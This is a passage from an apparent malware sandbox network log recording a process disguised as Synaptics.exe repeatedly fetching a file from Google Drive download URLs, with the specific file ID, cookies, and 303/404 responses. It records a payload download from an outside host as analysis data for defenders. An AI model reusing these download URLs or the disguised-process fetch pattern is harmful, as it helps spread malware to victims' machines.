131 | 192.168.2.9 | 49922 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:26:05 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
132 | 192.168.2.9 | 49924 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:26:05 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
133 | 192.168.2.9 | 49923 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:26:05 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
134 | 192.168.2.9 | 49926 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:26:06 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:26:06 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:06 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-K4KSnvRuEfSUX3tmXwuUPQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
135 | 192.168.2.9 | 49927 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:26:06 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:26:06 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:06 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ZbywnSk7ZRYfk5VrPg8BFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
136 | 192.168.2.9 | 49931 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:26:07 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:26:07 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6eu9pUIOG1f-LIet5Si0jCOb38jTUN9qG5EV-e7MODv99GaXU9dIjnIR_JAkl_1hLvwq0OAU0
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:07 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-zZFtaERH-_gqlQzQIiVeCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:26:07 UTC  140                IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 
                                                                                                                    2024-12-30 10:26:07 UTC  1390               IN         Data Ascii: 404 (Not Found)!!1</title><style nonce="S7T3jT7j6q9We9kttWIm-g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:26:07 UTC  122                IN         Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                    137         192.168.2.9  49928        142.250.186.97  443               7464  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp                Bytes transferred  Direction  Data
                                                                                                                    2024-12-30 10:26:07 UTC  387                OUT        GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:07 UTC  1250               IN         HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC5GtcmpD5rgeqP04MNWXXWxWyzwOcMBSe_GVuPnRCNg00-BOXyU0SomSPNEW9tZZDPpFaiqzF4
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:07 GMT
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-5wSOqklru4bXM1wJhqAqXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:26:07 UTC  140                IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 
                                                                                                                    2024-12-30 10:26:07 UTC  1390               IN         Data Ascii: 404 (Not Found)!!1</title><style nonce="DivYfd2uwVQnBDGXqRMSJg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:26:07 UTC  122                IN         Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                    138         192.168.2.9  49930        142.250.185.78  443               7464  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp                Bytes transferred  Direction  Data
                                                                                                                    2024-12-30 10:26:07 UTC  344                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:07 UTC  1314               IN         HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:07 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-50EcCqh_5kB_P-0zQ2ElGg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                    139         192.168.2.9  49929        142.250.185.78  443               7464  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp                Bytes transferred  Direction  Data
                                                                                                                    2024-12-30 10:26:07 UTC  344                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:07 UTC  1314               IN         HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:07 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-wTyhOZyF-DlU-fgFu4GMdg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                    140         192.168.2.9  49935        142.250.185.78  443               7464  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp                Bytes transferred  Direction  Data
                                                                                                                    2024-12-30 10:26:08 UTC  344                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:08 UTC  1314               IN         HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:08 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-SR9C_X5tXGR7TM6rLaeFnQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                    141         192.168.2.9  49934        142.250.185.78  443               7464  C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp                Bytes transferred  Direction  Data
                                                                                                                    2024-12-30 10:26:08 UTC  344                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:08 UTC  1314               IN         HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:08 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-sXT7iUU1rYPgVpiHffuckg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
142 | 192.168.2.9 | 49936 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:26:08 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:26:08 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC597P00JE0aqk-tNlVUuai51x2BlP6uVIAij4EHkRvlOLu1SbDrTs2_FHIY_pIogT7wKkABcEQ
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:08 GMT
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ZxcGcWu8GRrh6KCa_Oye2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2024-12-30 10:26:08 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:26:08 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="86pV44g544oQKCCJc8cPUw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:26:08 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
143 | 192.168.2.9 | 49937 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:26:08 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
